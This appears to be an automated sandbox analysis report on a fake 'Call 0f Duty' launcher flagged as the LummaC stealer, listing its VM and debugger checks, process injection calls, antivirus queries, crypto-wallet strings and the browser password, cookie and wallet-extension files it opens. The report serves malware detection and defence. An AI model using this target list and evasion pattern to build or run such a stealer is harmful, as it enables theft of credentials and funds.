Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Call 0f Duty A1 Launcher.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Call 0f Duty A1 Launcher.exe	Static PE information: section name: .00cfg
Source: Call 0f Duty A1 Launcher.exe	Static PE information: section name: .coS

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006C4BC5 push ecx; ret	0_2_006C4BD8
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_0360354D push esp; ret	2_3_03603593
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_035FD9ED push es; retf	2_3_035FDA2A
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_035FD9ED push es; retf	2_3_035FDA2A
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_035FD9ED push es; retf	2_3_035FDA2A
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03603595 push ebx; ret	2_3_036035AB
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 2_3_03602478 push 0000005Ch; ret	2_3_0360247B

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: 0_2_006C4CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006C4CA2

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe TID: 7344	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe TID: 7348	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: 0_2_006CC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,

0_2_006CC7DB

Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090339829.0000000003543000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp/X
Source: Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090379207.0000000003578000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089830085.0000000003577000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090379207.0000000003578000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089830085.0000000003577000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: 0_2_006C5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_006C5444

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006BCD10 mov eax, dword ptr fs:[00000030h]	0_2_006BCD10
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006DB18D mov edi, dword ptr fs:[00000030h]	0_2_006DB18D
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006BBD50 mov edi, dword ptr fs:[00000030h]	0_2_006BBD50

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: 0_2_006C9F90 GetProcessHeap,

0_2_006C9F90

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006C5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006C5444
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006C5438 SetUnhandledExceptionFilter,	0_2_006C5438
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006C7DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006C7DCA
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006C4AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_006C4AD9

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: 0_2_006DB18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_006DB18D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Memory written: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Process created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: 0_2_006C5200 cpuid

0_2_006C5200

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: 0_2_006C58C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006C58C5

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FF000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861895397.00000000035FF000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.0000000003600000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090538848.0000000003600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1807860141.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1807733461.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1807826105.00000000035FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1711171222.00000000035D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets~Kg
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1735240996.00000000035F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s/ElectronCash
Source: Call 0f Duty A1 Launcher.exe	String found in binary or memory: Jaxx Liberty
Source: Call 0f Duty A1 Launcher.exe	String found in binary or memory: ExodusWeb3
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1711171222.00000000035D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
